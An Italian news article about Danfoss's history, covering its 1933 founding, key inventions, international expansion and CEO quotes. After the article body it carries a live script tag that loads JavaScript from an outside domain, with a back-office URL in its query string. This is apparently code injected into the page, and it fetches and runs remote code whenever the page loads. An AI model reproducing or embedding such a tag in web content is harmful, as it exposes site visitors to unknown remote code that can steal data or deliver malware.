1. Home
  2. Notizie e Mercato
  3. Danfoss: da piccola azienda individuale a leader mondiale

Danfoss: da piccola azienda individuale a leader mondiale

Energie rinnovabili di
Il 1° settembre 2013 si è


Fin dalla sua fondazione ben 80 anni fa, Danfoss ha sempre avuto un’ottica internazionale. L’esportazione verso altri Paesi europei cominciò già nel 1939 (firmando il primo contratto di distribuzione con l'azienda olandese Itho), mentre nel 1949 venne aperta la prima sede commerciale in Argentina. Nel corso degli anni ’50 l’azienda aprì nuove sedi anche in Germania e negli USA (1958), preparandosi alla globalizzazione degli anni ’90, durante i quali si insediò con sedi commerciali e produttive sia in Russia (1993), sia in Cina (1996). Proprio questi quattro Paesi rappresentano oggi i principali mercati del Gruppo Danfoss.

Oltre a queste date, fondamentali per comprendere le ambilità internazionali dell'azienda, non si può dimenticare che:
- nel 1933Mads Clausen fondò l’azienda con il nome di "Dansk Køleautomatik- og Apparat-Fabrik" e produsse la prima valvola per impianti di refrigerazione;
- nel 1943 venne inventato il termostato per radiatori che permise di regolare il calore in una stanza senza inutili sprechi;
- nel 1946 l’azienda cambiò il proprio nome in Danfoss, combinando il prefisso “Dan” che richiamava le origini danesi con “foss”, che indicava la regolazione del flusso di liquidi tra le valvole;
- nel 1968 venne inventato il convertitore di frequenza VLT® e Danfoss divenne la prima azienda a produrre questa tecnologia su grande scala;
- nel 2010 per affrontare la crisi economica (cominciata nel 2008) e fronteggiare le sfide del mercato, l’azienda sviluppa la strategia Core & Clear, portando il Gruppo a maggiori vendite e nuovi guadagni;
- nel 2013 Danfoss acquistò le quote di Sauer-Danfoss che non ancora di sua proprietà, avviando la fusione delle due organizzazioni.

Niels B. Christiansen, attuale Presidente e CEO, spiega: ”Il mercato globale è sempre stato un concetto fondamentale per la Danfoss, molto prima che tutti parlassero di globalizzazione. Questa filosofia ci ha permesso di porci nella posizione di rilievo internazionale di cui oggi possiamo andar fieri. Fummo tra i primi ad inserirci nei mercati emergenti, lavorando alacremente per instaurare delle buone relazioni con clienti e partner commerciali. In futuro continueremo a concentrare i nostri sforzi sui mercati più importanti e su nazioni come il Brasile, la Russia, l’India e la Cina, oltre a rivolgere sempre più attenzione verso nuovi mercati come la Turchia e l’Indonesia, dove stiamo acquisendo sempre più esperienza”.

Già dalle prime invenzioni di Mads Clausen, i tecnici Danfoss si sono sempre dedicati allo sviluppo di prodotti innovativi che soddisfino le necessità dei clienti. Tutto cominciò con una valvola per la regolazione degli impianti di refrigerazione, per continuare con uno dei primi termostati per impianti di riscaldamento, fino ad arrivare alla prima produzione di massa al mondo di convertitori di frequenza per il controllo dei motori elettrici e al successivo sviluppo degli inverter fotovoltaici. Oggi Danfoss conta quasi 50 linee di prodotto diverse e circa il 4% delle vendite include prodotti innovativi in grado di risparmiare grandi quantità di energia e ridurre l’emissione di CO2.

Niels B. Christiansen racconta: “Il nostro principale sforzo è mirato a sviluppare prodotti che si basino sulle necessità del cliente. Facciamo in modo che i nostri clienti vengano coinvolti nello sviluppo dei nostri prodotti in tutte le sue fasi, assicurandoci che il risultato finale soddisfi completamente i requisiti richiesti. Un esempio lampante arriva dalla Cina, dove abbiamo lanciato una nuova serie di prodotti che rispecchi il target del mercato cinese”.

<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.5746345435429001" type="text/javascript"></script>